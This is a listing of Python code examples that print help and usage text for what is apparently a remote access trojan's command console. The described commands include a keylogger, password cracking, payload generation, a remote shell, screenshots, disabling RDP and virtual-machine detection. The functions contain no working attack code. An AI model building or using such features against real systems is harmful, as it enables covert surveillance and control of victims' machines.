Пример #1
0
def st_help_keylogger():
    st_print(
        "[*] Records keystrokes of the user. Allowing you to view the status, start, stop, and dump the keystokes to screen."
    )
    usage_keylogger()
Пример #2
0
def st_help_touch():
    st_print('[*] Creates a file with no contents.')
    usage_touch()
Пример #3
0
def st_help_upload():
    st_print('[*] Uploads a file/dir to the system.')
    usage_upload()
Пример #4
0
def st_help_stitchgen():
    st_print('[*] Generates stitch payloads based on running OS.')
    usage_stitchgen()
Пример #5
0
def st_help_sudo():
    st_print("[*] Runs the preceding command with admin priveleges.")
    usage_sudo()
Пример #6
0
def st_help_shell():
    st_print('[*] Opens a shell prompt of the requested session.')
    usage_shell()
Пример #7
0
def st_help_ssh():
    st_print('[*] Attempts to open a ssh connection to the requested host.')
    usage_ssh()
Пример #8
0
def st_help_lsmod():
    st_print('[*] Displays list of all installed drivers.')
    usage_lsmod()
Пример #9
0
def st_help_listen():
    st_print('[*] Server binds to given port to listen for connections.')
    usage_listen()
Пример #10
0
def st_help_ls():
    st_print('[*] Displays a list of files and subdirectories in a directory.')
    usage_ls()
Пример #11
0
def usage_crackpassword():
    st_print('[*] Usage: crackpassword\n')
Пример #12
0
def st_help_logintext():
    st_print("[*] Sets the text of the system's login screen.")
    usage_logintext()
Пример #13
0
def st_help_lockscreen():
    st_print("[*] Enters the system's lock screen.")
    usage_lockscreen()
Пример #14
0
def st_help_location():
    st_print("[*] Gives public IP and estimate geo location of the system.")
    usage_location()
Пример #15
0
def st_help_screenshot():
    st_print('[*] Takes a screenshot of the screen.')
    usage_screenshot()
Пример #16
0
def st_help_more():
    st_print('[*] Displays ouput of file path.')
    usage_more()
Пример #17
0
def st_help_sessions():
    st_print('[*] Displays machines available for exploitation.')
    usage_sessions()
Пример #18
0
def st_help_popup():
    st_print("[*] Displays popup box with custom message.")
    usage_popup()
Пример #19
0
def st_help_showkey():
    st_print(
        '[*] Displays the active encrypted AES key used for payload creation.')
    usage_showkey()
Пример #20
0
def st_help_pwd():
    st_print('[*] Displays the name of the current directory.')
    usage_pwd()
Пример #21
0
def st_help_start():
    st_print('[*] Starts the desired file.')
    usage_start()
Пример #22
0
def st_help_pyexec():
    st_print('[*] Runs python script on the system.')
    usage_pyexec()
Пример #23
0
def usage_disableRDP():
    st_print('[*] Usage: disableRDP\n')
Пример #24
0
def st_help_ps():
    st_print('[*] Displays list of all running processes.')
    usage_ps()
Пример #25
0
def st_help_sysinfo():
    st_print('[*] Displays system information.')
    usage_sysinfo()
Пример #26
0
def st_help_scanreg():
    st_print('[*] Display information on Windows Registry.')
    usage_scanreg()
Пример #27
0
def st_help_unhide():
    st_print('[*] Unhides the specified file/dir from the user.')
    usage_unhide()
Пример #28
0
def usage_dir():
    st_print('[*] Usage: dir\n')
Пример #29
0
def st_help_vmscan():
    st_print('[*] Detects if the system is a virtual machine.')
    usage_vmscan()
Пример #30
0
def st_help_ipconfig():
    st_print("[*] Displays the system's IP configuration.")
    usage_ipconfig()